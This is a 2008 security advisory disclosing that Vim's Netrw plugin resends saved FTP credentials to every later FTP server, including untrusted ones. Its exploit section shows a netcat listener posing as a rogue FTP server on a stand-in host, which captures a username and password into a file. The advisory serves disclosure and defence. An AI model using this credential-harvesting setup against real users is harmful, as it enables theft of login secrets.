vim-ftp.txt

`Vim: Netrw: FTP User Name and Password Disclosure  
  
1. SUMMARY  
  
Product : Vim -- Vi IMproved  
Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109  
Impact : Credentials disclosure  
Wherefrom: Remote  
Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html  
  
The Vim Netrw Plugin shares the FTP user name and password across all  
FTP sessions. Every time Vim makes a new FTP connection, it sends the  
user name and password of the previous FTP session to the FTP server.  
  
  
2. BACKGROUND  
  
``Vim is an almost compatible version of the UNIX editor Vi. Many new  
features have been added: multi-level undo, syntax highlighting,  
command line history, on-line help, spell checking, filename  
completion, block operations, etc.''  
  
-- Vim README.txt  
  
``Netrw supports "transparent" editing of files on other machines  
using [...] vim ftp://hostname/path/to/file''  
  
``Attempts to use ftp will prompt you for a user-id and a password.  
These will be saved in global variables g:netrw_uid and  
s:netrw_passwd; subsequent uses of ftp will re-use those two items  
to simplify the further use of ftp. However, if you need to use a  
different user id and/or password, you'll want to call NetUserPass()  
first.''  
  
-- Netrw Reference Manual (``pi_netrw.txt'')  
  
  
3. VULNERABILITY  
  
Once vim successfully connects to an FTP server using a user name and  
password credentials, it will re-use them in all subsequent FTP  
sessions, regardless of the domain name or TCP port.  
  
This behaviour is documented, although the documentation states the  
credentials are ``retained on a per-session basis''. Apparently the Vim  
session, not the FTP session:  
  
``g:netrw_uid (ftp) user-id, retained on a per-session basis  
s:netrw_passwd (ftp) password, retained on a per-session basis''  
  
-- Netrw Reference Manual (``pi_netrw.txt'')  
  
Although FTP communication is not encrypted and therefore open to  
eavesdropping, if the access to the network is protected, a  
credentials-based access control is meaningful, and the credentials must  
be kept secret. For example, an FTP connection to a virtual Xen  
instance on the same physical machine is secure; so is an FTP session  
over a local ethernet segment secured against access from untrusted  
parties.  
  
  
4. EXPLOIT  
  
No adversary action on the part of the attacker is necessary, apart from  
keeping logs of the user name, password, source IP address, and other  
information about the FTP session.  
  
An example using netcat(1) for the rouge FTP server. There is another  
FTP server already running on the machine:  
  
# For the sake of this example, a custom hosts file. Note that  
# ftp.secure.example and ftp.rogue.example map to different IP  
# addresses.  
$ grep '\.example' /etc/hosts  
127.0.1.1 ftp.secure.example  
127.0.1.2 ftp.rogue.example  
# There is a stock FTP server running already  
$ netstat -plan | grep ftp  
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd  
# Start the rogue FTP server  
$ printf '220\r\n331\r\n' \  
| netcat -lp 31337 ftp.rogue.example > credentials&  
# We use the ex command for clarity.  
$ ex ftp://ftp.secure.example/  
Enter username: rdancer  
Enter Password: *************  
Entering Ex mode. Type "visual" to go to Normal mode.  
:spl ftp://ftp.rogue.example:31337/  
"ftp://ftp.rogue.example:31337/" --No lines in buffer--  
:qa!  
$ cat credentials  
USER rdancer  
PASS z5vS24u76OrGM  
  
  
5. COPYRIGHT  
  
This advisory is Copyright 2008 Jan Minar <[email protected]>  
  
Copying welcome, under the Creative Commons ``Attribution-Share Alike''  
License http://creativecommons.org/licenses/by-sa/2.0/uk/  
  
Code included herein, and accompanying this advisory, may be copied  
according to the GNU General Public License version 2, or the Vim  
license. See the subdirectory ``licenses''.  
  
Various portions of the accompanying code may have been written by  
various parties. Those parties may hold copyright, and those portions  
may be copied according to their respective licenses.  
  
  
6. HISTORY  
  
2008-08-12 Sent to: <[email protected]>, <[email protected]>,  
<[email protected]>,  
<[email protected]>,  
Charles E Campbell, Jr (Vim Netrw Plugin Maintainer)  
<[email protected]>  
  
`